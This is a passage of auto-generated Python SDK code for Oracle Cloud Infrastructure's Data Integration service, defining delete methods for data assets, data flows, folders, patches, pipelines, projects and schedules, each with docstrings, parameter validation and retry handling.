For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/delete_connection_validation.py.html>`__ to see an example of how to use delete_connection_validation API.
"""
resource_path = "/workspaces/{workspaceId}/connectionValidations/{connectionValidationKey}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_connection_validation got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"connectionValidationKey": connection_validation_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_data_asset(self, workspace_id, data_asset_key, **kwargs):
"""
Removes a data asset using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str data_asset_key: (required)
The data asset key.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/delete_data_asset.py.html>`__ to see an example of how to use delete_data_asset API.
"""
resource_path = "/workspaces/{workspaceId}/dataAssets/{dataAssetKey}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_data_asset got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"dataAssetKey": data_asset_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_data_flow(self, workspace_id, data_flow_key, **kwargs):
"""
Removes a data flow from a project or folder using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str data_flow_key: (required)
The data flow key.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/delete_data_flow.py.html>`__ to see an example of how to use delete_data_flow API.
"""
resource_path = "/workspaces/{workspaceId}/dataFlows/{dataFlowKey}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_data_flow got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"dataFlowKey": data_flow_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_data_flow_validation(self, workspace_id, data_flow_validation_key, **kwargs):
"""
Removes a data flow validation using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str data_flow_validation_key: (required)
The key of the dataflow validation.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/delete_data_flow_validation.py.html>`__ to see an example of how to use delete_data_flow_validation API.
"""
resource_path = "/workspaces/{workspaceId}/dataFlowValidations/{dataFlowValidationKey}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_data_flow_validation got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"dataFlowValidationKey": data_flow_validation_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_external_publication(self, workspace_id, task_key, external_publications_key, **kwargs):
"""
Removes a published object using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str task_key: (required)
The task key.
:param str external_publications_key: (required)
The external published object key.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/delete_external_publication.py.html>`__ to see an example of how to use delete_external_publication API.
"""
resource_path = "/workspaces/{workspaceId}/tasks/{taskKey}/externalPublications/{externalPublicationsKey}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_external_publication got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"taskKey": task_key,
"externalPublicationsKey": external_publications_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_external_publication_validation(self, workspace_id, task_key, external_publication_validation_key, **kwargs):
"""
Removes a task validation using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str task_key: (required)
The task key.
:param str external_publication_validation_key: (required)
The external published object key.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/delete_external_publication_validation.py.html>`__ to see an example of how to use delete_external_publication_validation API.
"""
resource_path = "/workspaces/{workspaceId}/tasks/{taskKey}/externalPublicationValidations/{externalPublicationValidationKey}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_external_publication_validation got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"taskKey": task_key,
"externalPublicationValidationKey": external_publication_validation_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_folder(self, workspace_id, folder_key, **kwargs):
"""
Removes a folder from a project using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str folder_key: (required)
The folder key.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/delete_folder.py.html>`__ to see an example of how to use delete_folder API.
"""
resource_path = "/workspaces/{workspaceId}/folders/{folderKey}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_folder got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"folderKey": folder_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_patch(self, workspace_id, application_key, patch_key, **kwargs):
"""
Removes a patch using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str patch_key: (required)
The patch key.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/delete_patch.py.html>`__ to see an example of how to use delete_patch API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/patches/{patchKey}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_patch got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key,
"patchKey": patch_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_pipeline(self, workspace_id, pipeline_key, **kwargs):
"""
Removes a pipeline from a project or folder using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str pipeline_key: (required)
The pipeline key.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/delete_pipeline.py.html>`__ to see an example of how to use delete_pipeline API.
"""
resource_path = "/workspaces/{workspaceId}/pipelines/{pipelineKey}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_pipeline got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"pipelineKey": pipeline_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_pipeline_validation(self, workspace_id, pipeline_validation_key, **kwargs):
"""
Removes a pipeline validation using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str pipeline_validation_key: (required)
The key of the pipeline validation.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/delete_pipeline_validation.py.html>`__ to see an example of how to use delete_pipeline_validation API.
"""
resource_path = "/workspaces/{workspaceId}/pipelineValidations/{pipelineValidationKey}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_pipeline_validation got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"pipelineValidationKey": pipeline_validation_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_project(self, workspace_id, project_key, **kwargs):
"""
Removes a project from the workspace using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str project_key: (required)
The project key.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/delete_project.py.html>`__ to see an example of how to use delete_project API.
"""
resource_path = "/workspaces/{workspaceId}/projects/{projectKey}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_project got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"projectKey": project_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_schedule(self, workspace_id, application_key, schedule_key, **kwargs):
"""
Endpoint to delete schedule.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str schedule_key: (required)
Schedule Key
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
